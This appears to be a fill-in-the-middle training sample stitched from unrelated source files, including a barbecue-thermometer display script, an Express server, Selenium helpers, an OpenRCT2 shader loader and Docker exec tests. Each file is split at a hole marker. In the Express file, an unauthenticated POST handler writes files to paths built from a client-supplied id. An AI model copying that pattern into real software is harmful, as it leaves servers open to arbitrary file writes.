pit_on = NX_getvalue('main.pit_on.val')
pitmaster_setvalues(pit_on = pit_on)
elif event['data']['id'] == 4:
# pit_pid
pit_pid = NX_getvalue('main.pit_pid.val')
pitmaster_setvalues(pit_pid = pit_pid)
elif event['data']['id'] == 5:
# pit_type
pit_type = NX_getvalue('main.pit_type.val')
pitmaster_setvalues(pit_type = pit_type)
elif event['data']['id'] == 6:
# pit_inverted
pit_inverted = NX_getvalue('main.pit_inverted.val')
pitmaster_setvalues(pit_inverted = pit_inverted)
elif event['data']['area'] == 4:
if event['data']['id'] == 0:
# dim
dim = NX_getvalue('main.dim.val')
display_setvalues(dim = dim)
elif event['data']['id'] == 1:
# timeout
timeout = NX_getvalue('main.timeout.val')
display_setvalues(timeout = timeout)
elif event['data']['area'] == 5:
if event['data']['id'] == 0:
# pi_down
# pi_down = NX_getvalue('main.pi_down.val')
todo_setvalues(pi_down = 1)
elif event['data']['id'] == 1:
# pi_reboot
# pi_reboot = NX_getvalue('main.pi_reboot.val')
todo_setvalues(pi_reboot = 1)
elif event['data']['id'] == 4:
# main.password.txt = WLAN konfigurieren
passphrase = wlan_setpassphrase(ssids[ssids_i], NX_getvalue('main.password.txt'))
wlan_reconnect()
# Sleepmode deaktivierne
# NX_sendcmd('thsp=0')
# 20s auf Verbindung warten
i = 0
while i in range(45) and not stop_event.is_set():
interfaces = lan_getvalues()
if 'wlan0' in interfaces:
# wlan0 hat eine IP-Adresse
NX_sendvalues({'main.result.txt:20': 'IP:' + interfaces['wlan0']['ip']})
NX_sendcmd('page result')
for interface in interfaces:
values['wlaninfo.' + interfaces[interface]['name'] + '.txt:20'] = interfaces[interface]['ip']
NX_sendvalues(values)
break
elif i == 44:
# wlan0 hat nach 20s noch keine IP-Adresse
NX_sendvalues({'main.result.txt:20': 'fehlgeschlagen'})
NX_sendcmd('page result')
break
else:
time.sleep(1)
i = i + 1
# NX_sendcmd('thsp=' + str(Config.getint('Display', 'timeout')))
elif event['data']['id'] == 5:
values = dict()
interfaces = lan_getvalues()
for interface in interfaces:
values['wlaninfo.' + interfaces[interface]['name'] + '.txt:20'] = interfaces[interface]['ip']
signal = wlan_getsignal('wlan0')
values['main.signal.val'] = signal
NX_sendvalues(values)
elif event['data']['id'] == 6:
wlan_reconnect()
elif event['type'] == 'custom_cmd':
if event['data']['area'] == 5:
if event['data']['id'] == 0:
if event['data']['action'] == 0:
logger.debug('Fahre herunter...')
todo_setvalues(pi_down = 1)
elif event['data']['id'] == 1:
if event['data']['action'] == 0:
logger.debug('Starte neu...')
todo_setvalues(pi_reboot = 1)
elif event['data']['id'] == 3:
if event['data']['action'] == 0:
# WLAN scannen
logger.debug('Scanne WLANs')
ssids = wlan_getssids()
ssids_i = 0
logger.debug('SSIDs:' + str(ssids))
if not ssids:
NX_sendvalues({'main.ssid.txt:35': 'Kein WLAN'})
NX_sendcmd('page setup')
else:
NX_sendvalues({'main.ssid.txt:35': ssids[ssids_i]})
NX_sendcmd('page ssidselect')
elif event['data']['action'] == 1:
# voherige SSID
if ssids_i <= 0:
ssids_i = len(ssids)-1
else:
ssids_i = ssids_i - 1
NX_sendvalues({'main.ssid.txt:35': ssids[ssids_i]})
elif event['data']['action'] == 2:
# nächste SSID
if ssids_i >= len(ssids)-1:
ssids_i = 0
else:
ssids_i = ssids_i + 1
NX_sendvalues({'main.ssid.txt:35': ssids[ssids_i]})
elif event['data']['area'] == 6:
if event['data']['id'] == 0:
if event['data']['action'] == 0:
logger.debug('Alarm bestätigt!')
alert_setack()
NX_eventq.task_done()
elif temps_event.is_set():
logger.debug('Temperatur Event')
values = dict()
new_temps = temp_getvalues()
if new_temps != None:
temps_event.clear()
for i in range(8):
if temps[i]['value'] != new_temps[i]['value']:
if new_temps[i]['value'] == '999.9':
values['main.kanal' + str(i) + '.txt:10'] = channels[i]['name']
else:
values['main.kanal' + str(i) + '.txt:10'] = new_temps[i]['value']
if temps[i]['alert'] != new_temps[i]['alert']:
values['main.alert' + str(i) + '.txt:10'] = new_temps[i]['alert']
if NX_sendvalues(values):
temps = new_temps
else:
# Im Fehlerfall später wiederholen
temps_event.set()
elif pitconf_event.is_set():
logger.debug('Pitmasterkonfiguration Event')
values = dict()
pitconf_event.clear()
new_pitconf = pitmaster_config_getvalues()
if pitconf['set'] != new_pitconf['set']:
values['main.pit_set.txt:10'] = round(new_pitconf['set'],1)
if pitconf['ch'] != new_pitconf['ch']:
values['main.pit_ch.val'] = int(new_pitconf['ch'])
if pitconf['open_lid_detection'] != new_pitconf['open_lid_detection']:
values['main.pit_lid.val'] = int(new_pitconf['open_lid_detection'])
if pitconf['inverted'] != new_pitconf['inverted']:
values['main.pit_inverted.val'] = int(new_pitconf['inverted'])
if pitconf['on'] != new_pitconf['on']:
values['main.pit_on.val'] = int(new_pitconf['on'])
if not new_pitconf['on']:
values['main.pit_power.val'] = 0
if pitconf['controller_type'] != new_pitconf['controller_type']:
values['main.pit_pid.val'] = {'False': 0, 'PID': 1}[new_pitconf['controller_type']]
if pitconf['type'] != new_pitconf['type']:
values['main.pit_type.val'] = pit_types[new_pitconf['type']]
if NX_sendvalues(values):
pitconf = new_pitconf
else:
# Im Fehlerfall später wiederholen
pitconf_event.set()
elif pitmaster_event.is_set():
logger.debug('Pitmaster Event')
values = dict()
pitmaster_event.clear()
new_pitmaster = pitmaster_getvalues()
if new_pitmaster != None:
if pitmaster['new'] != new_pitmaster['new']:
if pitconf['on']:
# Wenn Pitmaster aus, 0-Wert senden.
values['main.pit_power.val'] = int(round(float(new_pitmaster['new'])))
else:
values['main.pit_power.val'] = 0
if NX_sendvalues(values):
pitmaster = new_pitmaster
else:
# Im Fehlerfall später wiederholen
pitmaster_event.set()
elif channels_event.is_set():
logger.debug('Channels Event')
values = dict()
channels_event.clear()
new_channels = channels_getvalues()
for i in range(8):
if channels[i]['temp_min'] != new_channels[i]['temp_min']:
values['main.al' + str(i) + 'minist.txt:10'] = new_channels[i]['temp_min']
if channels[i]['temp_max'] != new_channels[i]['temp_max']:
values['main.al' + str(i) + 'maxist.txt:10'] = new_channels[i]['temp_max']
if channels[i]['sensor'] != new_channels[i]['sensor']:
values['main.sensor_type' + str(i) + '.val'] = new_channels[i]['sensor']
if channels[i]['name'] != new_channels[i]['name']:
values['main.name' + str(i) + '.txt:10'] = new_channels[i]['name']
if new_temps[i]['value'] == '999.9':
values['main.kanal' + str(i) + '.txt:10'] = new_channels[i]['name']
if NX_sendvalues(values):
channels = new_channels
else:
# Im Fehlerfall später wiederholen
channels_event.set()
else:
time.sleep(0.01)
logger.info('Display-Thread gestoppt')
return True
def config_write(configfile, config):
# Schreibt das Configfile
# Ein Lock sollte im aufrufenden Programm gehalten werden!
with open(configfile + '_tmp', 'w') as new_ini:
for section_name in config.sections():
new_ini.write('[' + section_name + ']\n')
for (key, value) in config.items(section_name):
new_ini.write(str(key) + ' = ' + str(value) + '\n')
new_ini.write('\n')
new_ini.flush()
os.fsync(new_ini.fileno())
new_ini.close()
os.rename(configfile + '_tmp', configfile)
def raise_keyboard(signum, frame):
raise KeyboardInterrupt('Received SIGTERM')
def check_pid(pid):
try:
os.kill(pid, 0)
except OSError:
return False
else:
return True
# Auf geht es
logger.info('Nextion Display gestartet!')
logger.debug('Skriptversion: ' + version)
#Einlesen der Software-Version
for line in open('/var/www/header.php'):
if 'webGUIversion' in line:
build = re.match('.*=\s*"(.*)"', line).group(1)
break
#ueberpruefe ob der Dienst schon laeuft
pid = str(os.getpid())
pidfilename = '/var/run/'+os.path.basename(__file__).split('.')[0]+'.pid'
if os.access(pidfilename, os.F_OK):
pidfile = open(pidfilename, "r")
pidfile.seek(0)
old_pid = int(pidfile.readline())
if check_pid(old_pid):
print("%s existiert, Prozess läuft bereits, beende Skript" % pidfilename)
logger.error("%s existiert, Prozess läuft bereits, beende Skript" % pidfilename)
sys.exit()
else:
logger.info("%s existiert, Prozess läuft nicht, setze Ausführung fort" % pidfilename)
pidfile.seek(0)
open(pidfilename, 'w').write(pid)
else:
logger.debug("%s geschrieben" % pidfilename)
open(pidfilename, 'w').write(pid)
# Display initialisieren
logger.debug('Lade Displaykonfiguration')
display = display_getvalues()
logger.debug('Öffne seriellen Port: ' + display['serialdevice'])
ser = serial.Serial()
logger.debug('Initialisiere Display, Baudrate: ' + str(display['serialspeed']))
if NX_init(display['serialdevice'], display['serialspeed']):
logger.debug('Initialisierung OK')
signal.signal(15, raise_keyboard)
logger.debug('Starte Reader-Thread')
NX_reader_thread = threading.Thread(target=NX_reader)
NX_reader_thread.daemon = True
NX_reader_thread.start()
logger.debug('Starte Display-Thread')
NX_display_thread = threading.Thread(target=NX_display)
NX_display_thread.daemon = True
NX_display_thread.start()
logger.debug('Starte Dateiüberwachung')
wm = pyinotify.WatchManager()
mask = pyinotify.IN_CLOSE_WRITE | pyinotify.IN_MOVED_TO
notifier = pyinotify.ThreadedNotifier(wm, FileEvent())
notifier.start()
wdd = wm.add_watch(curPath, mask)
wdd2 = wm.add_watch(pitPath, mask)
wdd3 = wm.add_watch(confPath, mask)
try:
while True:
# Hauptschleife
if not NX_display_thread.is_alive():
break
if not NX_reader_thread.is_alive():
break
time.sleep(0.5)
except KeyboardInterrupt:
if not NX_wake_event.is_set():
NX_sendcmd('sleep=0')
time.sleep(0.2)
NX_sendvalues({'boot.nextion_down.val': 1})
NX_switchpage('boot')
logger.debug('Sende Stopsignal an alle Threads')
notifier.stop()
# Signal zum stoppen geben
stop_event.set()
logger.debug('Warte auf Threads...')
# Auf Threads warten
NX_display_thread.join()
NX_reader_thread.join()
else:
logger.error('Keine Verbindung zum Nextion Display')
# Vielleicht ist die Software noch nicht auf dem Display installiert
open('/var/www/tmp/nextionupdate', 'w').close()
logger.info('Display stopped!')
logging.shutdown()
os.unlink(pidfilename)<|fim▁end|> | |
<|file_name|>test4_grunt_spec.js<|end_file_name|><|fim▁begin|>'use strict';
var _ = require("lodash-node")
,parserlib = require("parserlib") // for linting CSS
,fse = require("fs-extra")
,cwd = process.cwd()
describe("test 4 - check css is valid", function() {
var originalTimeout;
beforeEach(function() {
originalTimeout = jasmine.DEFAULT_TIMEOUT_INTERVAL;
jasmine.DEFAULT_TIMEOUT_INTERVAL = 4000;
});
afterEach(function() {
jasmine.DEFAULT_TIMEOUT_INTERVAL = originalTimeout;
});
/**
* Lodash template used just for converting path vars
*/
var rootDirObj = { rootDir: "./" }
,config = require("./grunt_configs/test4.js").test
,DEST = _.template( config.dest, rootDirObj );
it("should have created a css file for icons which should no longer contains any template syntax, then lint the styles.", function(done) {
expect( fse.existsSync(DEST+"icons.css") ).toBe( true );
var css = fse.readFileSync(DEST+"icons.css").toString();
expect( css.indexOf("<%=") ).toEqual(-1);
lintCSS( done, css );
});
it("should have copied the `svgloader.js` file into dist.", function() {
expect( fse.existsSync(DEST+"svgloader.js") ).toBe( true );
});
it("should have NOT generated sprite and placed it into dist.", function() {
expect( fse.existsSync(DEST + "sprite.png") ).toBe( false );<|fim▁hole|>});
function lintCSS( done, returnedStr ) {
// Now we lint the CSS
var parser = new parserlib.css.Parser();
// will get changed to true in error handler if errors detected
var errorsFound = false;
parser.addListener("error", function(event){
console.log("Parse error: " + event.message + " (" + event.line + "," + event.col + ")", "error");
errorsFound = true;
});
parser.addListener("endstylesheet", function(){
console.log("Finished parsing style sheet");
expect( errorsFound ).toBe( false );
// finish the test
done();
});
parser.parse( returnedStr );
}<|fim▁end|> | });
|
<|file_name|>sky.js<|end_file_name|><|fim▁begin|>var fs = require('fs');
var mysql = require('mysql');
var qs = require('querystring');
var express = require('express');
var config = JSON.parse(fs.readFileSync(__dirname+'/config.json', 'UTF-8'));
// -----------------------------------------------------------------------------
// Keep a persistant connection to the database (reconnect after an error or disconnect)
// -----------------------------------------------------------------------------
if (typeof config.databaseConnection == 'undefined' || typeof config.databaseConnection.retryMinTimeout == 'undefined')
config.databaseConnection = {retryMinTimeout: 2000, retryMaxTimeout: 60000};
var connection, retryTimeout = config.databaseConnection.retryMinTimeout;
function persistantConnection(){
connection = mysql.createConnection(config.database);
connection.connect(
function (err){
if (err){
console.log('Error connecting to database: '+err.code);
setTimeout(persistantConnection, retryTimeout);
console.log('Retrying in '+(retryTimeout / 1000)+' seconds');
if (retryTimeout < config.databaseConnection.retryMaxTimeout)
retryTimeout += 1000;
}
else{
retryTimeout = config.databaseConnection.retryMinTimeout;
console.log('Connected to database');
}
});
connection.on('error',
function (err){
console.log('Database error: '+err.code);
if (err.code === 'PROTOCOL_CONNECTION_LOST')
persistantConnection();
});
}
//persistantConnection();
var app = express();
// -----------------------------------------------------------------------------
// Deliver the base template of SPA
// -----------------------------------------------------------------------------
app.get('/', function (req, res){
res.send(loadTemplatePart('base.html', req));
});
app.get('/images/:id', function (req, res){
res.send(dataStore.images);
});
// -----------------------------------------------------------------------------
// Deliver static assets
// -----------------------------------------------------------------------------
app.use('/static/', express.static('static'));
// ==================================================
// Below this point are URIs that are accesible from outside, in REST API calls
// ==================================================
app.use(function(req, res, next){
res.header("Access-Control-Allow-Origin", "*");
res.header("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept");
next();
});
// -----------------------------------------------------------------------------
// API Endpoint to receive data
// -----------------------------------------------------------------------------
var dataStore = {};
app.post('/api/put', function (req, res){
// Needs to authenticate the RPi module
//
handlePost(req, function(data){
//console.log(data);
for (var i = 0; i < 4; i++){
//var img = Buffer.from(, 'base64');
fs.writeFile('./static/images/'+data.id+'/'+i+'.png',
'data:image/png;base64,'+data.images[i],
function(err){
if (err)
console.log(err);
}
);
}
//<|fim▁hole|>});
app.listen(config.listenPort, function (){
console.log('RainCatcher server is listening on port '+config.listenPort);
});
// --------------------------------------------------------------------------
// Handler for multipart POST request/response body
function handlePost(req, callback){
var body = '';
req.on('data', function (data){
body += data;
if (body.length > 1e8)
req.connection.destroy();
});
req.on('end', function (data){
var post = body;
try{
post = JSON.parse(post);
}
catch(e){
try{
post = qs.parse(post);
}
catch(e){}
}
callback(post);
});
}
function loadTemplatePart(template, req){
try{
return fs.readFileSync('./templates/'+template, 'utf8');
}
catch(e){
return '<h2>Page Not Found</h2>';
}
}
Date.prototype.sqlFormatted = function() {
var yyyy = this.getFullYear().toString();
var mm = (this.getMonth()+1).toString();
var dd = this.getDate().toString();
return yyyy +'-'+ (mm[1]?mm:"0"+mm[0]) +'-'+ (dd[1]?dd:"0"+dd[0]);
};
function isset(obj){
return typeof obj != 'undefined';
}<|fim▁end|> | //dataStore[data.id] = data;
dataStore = data;
res.send('ok');
}); |
<|file_name|>nav.js<|end_file_name|><|fim▁begin|>var Backbone = require('backbone'),
$ = require('jquery'),
lang = require('../lang'),
template = require('../templates/nav.hbs')
module.exports = Backbone.View.extend({
events: {
'click .js-nav': 'navigate'<|fim▁hole|> },
initialize: function (options) {
this.$el.html(template({
name: window.app.name,
lang: lang
}))
this.$navLis = this.$('.js-li')
this.setActivePage()
this.listenTo(options.router, 'route', this.setActivePage)
return this
},
setActivePage: function () {
var pathname = window.location.pathname
this.$navLis.removeClass('active')
this.$('.js-nav').each(function (index, value) {
var $this = $(this)
var href = $this.attr('href')
if(href === '/') {
if(pathname === '/')
$this.parent().addClass('active')
}
else {
if(href && pathname.match(new RegExp('^' + href.replace(/[-\/\\^$*+?.()|[\]{}]/g, '\\$&')))) {
$this.parent().addClass('active')
}
}
})
},
navigate: function (e) {
e.preventDefault()
this.$('.navbar-collapse').removeClass('in')
Backbone.history.navigate($(e.target).attr('href'), {
trigger: true,
replace: false
})
}
})<|fim▁end|> | |
<|file_name|>OpenGLShaderProgram.cpp<|end_file_name|><|fim▁begin|>#pragma region Copyright (c) 2014-2017 OpenRCT2 Developers
/*****************************************************************************
* OpenRCT2, an open source clone of Roller Coaster Tycoon 2.
*
* OpenRCT2 is the work of many authors, a full list can be found in contributors.md
* For more information, visit https://github.com/OpenRCT2/OpenRCT2
*
* OpenRCT2 is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* A full copy of the GNU General Public License can be found in licence.txt
*****************************************************************************/
#pragma endregion
#ifndef DISABLE_OPENGL
#include <openrct2/Context.h>
#include <openrct2/core/Console.hpp>
#include <openrct2/core/FileStream.hpp>
#include <openrct2/core/Path.hpp>
#include <openrct2/core/String.hpp>
#include <openrct2/PlatformEnvironment.h>
#include "OpenGLShaderProgram.h"
using namespace OpenRCT2;
OpenGLShader::OpenGLShader(const char * name, GLenum type)
{
_type = type;
auto path = GetPath(name);
auto sourceCode = ReadSourceCode(path);
auto sourceCodeStr = sourceCode.c_str();
_id = glCreateShader(type);
glShaderSource(_id, 1, (const GLchar * *)&sourceCodeStr, nullptr);
glCompileShader(_id);
GLint status;
glGetShaderiv(_id, GL_COMPILE_STATUS, &status);
if (status != GL_TRUE)
{
char buffer[512];
glGetShaderInfoLog(_id, sizeof(buffer), nullptr, buffer);
glDeleteShader(_id);
Console::Error::WriteLine("Error compiling %s", path.c_str());
Console::Error::WriteLine(buffer);
throw std::runtime_error("Error compiling shader.");
}
}
OpenGLShader::~OpenGLShader()
{
glDeleteShader(_id);
}
GLuint OpenGLShader::GetShaderId()
{
return _id;
}
std::string OpenGLShader::GetPath(const std::string &name)
{
auto env = GetContext()->GetPlatformEnvironment();
auto shadersPath = env->GetDirectoryPath(DIRBASE::OPENRCT2, DIRID::SHADER);
auto path = Path::Combine(shadersPath, name);
if (_type == GL_VERTEX_SHADER)
{
path += ".vert";
}
else
{
path += ".frag";
}
return path;
}
std::string OpenGLShader::ReadSourceCode(const std::string &path)
{
auto fs = FileStream(path, FILE_MODE_OPEN);
uint64 fileLength = fs.GetLength();
if (fileLength > MaxSourceSize)
{
throw IOException("Shader source too large.");
}
auto fileData = std::string((size_t)fileLength + 1, '\0');
fs.Read((void *)fileData.data(), fileLength);
return fileData;
}
OpenGLShaderProgram::OpenGLShaderProgram(const char * name)
{
_vertexShader = new OpenGLShader(name, GL_VERTEX_SHADER);
_fragmentShader = new OpenGLShader(name, GL_FRAGMENT_SHADER);
_id = glCreateProgram();
glAttachShader(_id, _vertexShader->GetShaderId());
glAttachShader(_id, _fragmentShader->GetShaderId());
glBindFragDataLocation(_id, 0, "oColour");
if (!Link())
{
char buffer[512];
GLsizei length;
glGetProgramInfoLog(_id, sizeof(buffer), &length, buffer);
Console::Error::WriteLine("Error linking %s", name);
Console::Error::WriteLine(buffer);
throw std::runtime_error("Failed to link OpenGL shader.");
}
}
OpenGLShaderProgram::~OpenGLShaderProgram()
{
if (_vertexShader != nullptr)
{<|fim▁hole|> delete _vertexShader;
}
if (_fragmentShader != nullptr)
{
glDetachShader(_id, _fragmentShader->GetShaderId());
delete _fragmentShader;
}
glDeleteProgram(_id);
}
GLuint OpenGLShaderProgram::GetAttributeLocation(const char * name)
{
return glGetAttribLocation(_id, name);
}
GLuint OpenGLShaderProgram::GetUniformLocation(const char * name)
{
return glGetUniformLocation(_id, name);
}
void OpenGLShaderProgram::Use()
{
if (OpenGLState::CurrentProgram != _id)
{
OpenGLState::CurrentProgram = _id;
glUseProgram(_id);
}
}
bool OpenGLShaderProgram::Link()
{
glLinkProgram(_id);
GLint linkStatus;
glGetProgramiv(_id, GL_LINK_STATUS, &linkStatus);
return linkStatus == GL_TRUE;
}
#endif /* DISABLE_OPENGL */<|fim▁end|> | glDetachShader(_id, _vertexShader->GetShaderId()); |
<|file_name|>action_chains.py<|end_file_name|><|fim▁begin|># Copyright 2011 WebDriver committers
# Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The ActionChains implementation."""
from selenium.webdriver.remote.command import Command
class ActionChains(object):
"""Generate user actions.
All actions are stored in the ActionChains object. Call perform() to fire
stored actions."""
def __init__(self, driver):
"""Creates a new ActionChains.
Args:
driver: The WebDriver instance which performs user actions.
"""
self._driver = driver
self._actions = []
def perform(self):
"""Performs all stored actions."""
for action in self._actions:
action()
def click(self, on_element=None):
"""Clicks an element.
Args:
on_element: The element to click.
If None, clicks on current mouse position.
"""
if on_element: self.move_to_element(on_element)
self._actions.append(lambda:
self._driver.execute(Command.CLICK, {'button': 0}))
return self
def click_and_hold(self, on_element):
"""Holds down the left mouse button on an element.
Args:
on_element: The element to mouse down.
If None, clicks on current mouse position.
"""
if on_element: self.move_to_element(on_element)
self._actions.append(lambda:
self._driver.execute(Command.MOUSE_DOWN, {}))
return self
def context_click(self, on_element):
"""Performs a context-click (right click) on an element.
Args:
on_element: The element to context-click.
If None, clicks on current mouse position.
"""
if on_element: self.move_to_element(on_element)
self._actions.append(lambda:
self._driver.execute(Command.CLICK, {'button': 2}))
return self
def double_click(self, on_element):
"""Double-clicks an element.
Args:
on_element: The element to double-click.<|fim▁hole|> self._driver.execute(Command.DOUBLE_CLICK, {}))
return self
def drag_and_drop(self, source, target):
"""Holds down the left mouse button on the source element,
then moves to the target element and releases the mouse button.
Args:
source: The element to mouse down.
target: The element to mouse up.
"""
self.click_and_hold(source)
self.release(target)
return self
def drag_and_drop_by_offset(self, source, xoffset, yoffset):
"""Holds down the left mouse button on the source element,
then moves to the target element and releases the mouse button.
Args:
source: The element to mouse down.
xoffset: X offset to move to.
yoffset: Y offset to move to.
"""
self.click_and_hold(source)
self.move_by_offset(xoffset, yoffset)
self.release(source)
return self
def key_down(self, key, element=None):
"""Sends a key press only, without releasing it.
Should only be used with modifier keys (Control, Alt and Shift).
Args:
key: The modifier key to send. Values are defined in Keys class.
target: The element to send keys.
If None, sends a key to current focused element.
"""
if element: self.click(element)
self._actions.append(lambda:
self._driver.execute(Command.SEND_MODIFIER_KEY_TO_ACTIVE_ELEMENT, {
"value": key,
"isdown": True}))
return self
def key_up(self, key, element=None):
"""Releases a modifier key.
Args:
key: The modifier key to send. Values are defined in Keys class.
target: The element to send keys.
If None, sends a key to current focused element.
"""
if element: self.click(element)
self._actions.append(lambda:
self._driver.execute(Command.SEND_MODIFIER_KEY_TO_ACTIVE_ELEMENT, {
"value": key,
"isdown": False}))
return self
def move_by_offset(self, xoffset, yoffset):
"""Moving the mouse to an offset from current mouse position.
Args:
xoffset: X offset to move to.
yoffset: Y offset to move to.
"""
self._actions.append(lambda:
self._driver.execute(Command.MOVE_TO, {
'xoffset': xoffset,
'yoffset': yoffset}))
return self
def move_to_element(self, to_element):
"""Moving the mouse to the middle of an element.
Args:
to_element: The element to move to.
"""
self._actions.append(lambda:
self._driver.execute(Command.MOVE_TO, {'element': to_element.id}))
return self
def move_to_element_with_offset(self, to_element, xoffset, yoffset):
"""Move the mouse by an offset of the specificed element.
Offsets are relative to the top-left corner of the element.
Args:
to_element: The element to move to.
xoffset: X offset to move to.
yoffset: Y offset to move to.
"""
self._actions.append(lambda:
self._driver.execute(Command.MOVE_TO, {
'element': to_element.id,
'xoffset': xoffset,
'yoffset': yoffset}))
return self
def release(self, on_element):
"""Releasing a held mouse button.
Args:
on_element: The element to mouse up.
"""
if on_element: self.move_to_element(on_element)
self._actions.append(lambda:
self._driver.execute(Command.MOUSE_UP, {}))
return self
def send_keys(self, *keys_to_send):
"""Sends keys to current focused element.
Args:
keys_to_send: The keys to send.
"""
self._actions.append(lambda:
self._driver.switch_to_active_element().send_keys(*keys_to_send))
return self
def send_keys_to_element(self, element, *keys_to_send):
"""Sends keys to an element.
Args:
element: The element to send keys.
keys_to_send: The keys to send.
"""
self._actions.append(lambda:
element.send_keys(*keys_to_send))
return self<|fim▁end|> | If None, clicks on current mouse position.
"""
if on_element: self.move_to_element(on_element)
self._actions.append(lambda: |
<|file_name|>hexcanvas.py<|end_file_name|><|fim▁begin|>from kivy.uix.floatlayout import FloatLayout
from kivy.properties import NumericProperty, ObjectProperty, BoundedNumericProperty, ListProperty
from .node import Node
from math import sqrt
class HexCanvas(FloatLayout):
last_node = ObjectProperty(None, allownone=True)
grid = ObjectProperty([])
row_count = BoundedNumericProperty(11, min=0, max=11)
column_count = BoundedNumericProperty(22, min=0, max=22)
vvhelix_id = NumericProperty(0)
scaffold_path = ListProperty([])
"""docstring for NanoCanvas"""
def __init__(self, **kwargs):
#super(HexCanvas, self).__init__(**kwargs)
super().__init__(**kwargs)
self.__construct()
def __construct(self):
x_start, y_start = 30, 30
a = 60
x_offset = a / 2<|fim▁hole|> if j % 2 != 0:
offset = x_offset
else:
offset = 0
x = x_start + offset
for i in range(self.column_count):
node = Node(pos=(x, y), grid_id=(j, i))
row.append(node)
self.add_widget(node)
x += a
y += y_offset
self.grid.append(row)
def clean(self):
# TODO remove vhelixes and other stuff !!!
self.last_node = None
# for row in self.grid:
# for node in row:
# del node
self.grid = []
self.vvhelix_id = 0
self.scaffold_path = []
self.__construct()<|fim▁end|> | y_offset = a * sqrt(3) / 2
y = y_start
for j in range(self.row_count):
row = [] |
<|file_name|>RpcMessage.java<|end_file_name|><|fim▁begin|>/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.oncrpc;
/**
* Represent an RPC message as defined in RFC 1831.<|fim▁hole|> public static enum Type {
// the order of the values below are significant.
RPC_CALL,
RPC_REPLY;
public int getValue() {
return ordinal();
}
public static Type fromValue(int value) {
if (value < 0 || value >= values().length) {
return null;
}
return values()[value];
}
}
protected final int xid;
protected final Type messageType;
RpcMessage(int xid, Type messageType) {
if (messageType != Type.RPC_CALL && messageType != Type.RPC_REPLY) {
throw new IllegalArgumentException("Invalid message type " + messageType);
}
this.xid = xid;
this.messageType = messageType;
}
public abstract XDR write(XDR xdr);
public int getXid() {
return xid;
}
public Type getMessageType() {
return messageType;
}
protected void validateMessageType(Type expected) {
if (expected != messageType) {
throw new IllegalArgumentException("Message type is expected to be "
+ expected + " but got " + messageType);
}
}
}<|fim▁end|> | */
public abstract class RpcMessage {
/** Message type */ |
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
from setuptools import setup, find_packages
setup(<|fim▁hole|> author='Giuseppe Lavagetto',
author_email='[email protected]',
url='https://github.com/lavagetto/plumber',
install_requires=['argparse', 'Flask', 'jinja2'],
setup_requires=[],
zip_safe=True,
packages=find_packages(),
entry_points={
'console_scripts': [
'plumber-run = plumber.main:run',
],
},
)<|fim▁end|> | name='plumber',
version='0.0.1-alpha',
description='simple, mundane script to build and publish containers to marathon/mesos', |
<|file_name|>docker_cli_exec_test.go<|end_file_name|><|fim▁begin|>// +build !test_no_exec
package main
import (
"bufio"
"fmt"
"net/http"
"os"
"os/exec"
"path/filepath"
"reflect"
"sort"
"strings"
"sync"
"time"
"github.com/docker/docker/pkg/integration/checker"
"github.com/go-check/check"
)
func (s *DockerSuite) TestExec(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "sh", "-c", "echo test > /tmp/file && top")
out, _ := dockerCmd(c, "exec", "testing", "cat", "/tmp/file")
out = strings.Trim(out, "\r\n")
if out != "test" {
c.Errorf("container exec should've printed test but printed %q", out)
}
}
func (s *DockerSuite) TestExecInteractive(c *check.C) {
testRequires(c, DaemonIsLinux)
dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "sh", "-c", "echo test > /tmp/file && top")
execCmd := exec.Command(dockerBinary, "exec", "-i", "testing", "sh")
stdin, err := execCmd.StdinPipe()
if err != nil {
c.Fatal(err)
}
stdout, err := execCmd.StdoutPipe()
if err != nil {
c.Fatal(err)
}
if err := execCmd.Start(); err != nil {
c.Fatal(err)
}
if _, err := stdin.Write([]byte("cat /tmp/file\n")); err != nil {
c.Fatal(err)
}
r := bufio.NewReader(stdout)
line, err := r.ReadString('\n')
if err != nil {
c.Fatal(err)
}
line = strings.TrimSpace(line)
if line != "test" {
c.Fatalf("Output should be 'test', got '%q'", line)
}
if err := stdin.Close(); err != nil {
c.Fatal(err)
}
errChan := make(chan error)
go func() {
errChan <- execCmd.Wait()
close(errChan)
}()
select {
case err := <-errChan:
c.Assert(err, check.IsNil)
case <-time.After(1 * time.Second):
c.Fatal("docker exec failed to exit on stdin close")
}
}
func (s *DockerSuite) TestExecAfterContainerRestart(c *check.C) {
testRequires(c, DaemonIsLinux)
out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
cleanedContainerID := strings.TrimSpace(out)
dockerCmd(c, "restart", cleanedContainerID)
out, _ = dockerCmd(c, "exec", cleanedContainerID, "echo", "hello")
outStr := strings.TrimSpace(out)
if outStr != "hello" {
c.Errorf("container should've printed hello, instead printed %q", outStr)
}
}
func (s *DockerDaemonSuite) TestExecAfterDaemonRestart(c *check.C) {
testRequires(c, DaemonIsLinux)
testRequires(c, SameHostDaemon)
if err := s.d.StartWithBusybox(); err != nil {
c.Fatalf("Could not start daemon with busybox: %v", err)
}
if out, err := s.d.Cmd("run", "-d", "--name", "top", "-p", "80", "busybox:latest", "top"); err != nil {
c.Fatalf("Could not run top: err=%v\n%s", err, out)
}
if err := s.d.Restart(); err != nil {
c.Fatalf("Could not restart daemon: %v", err)
}
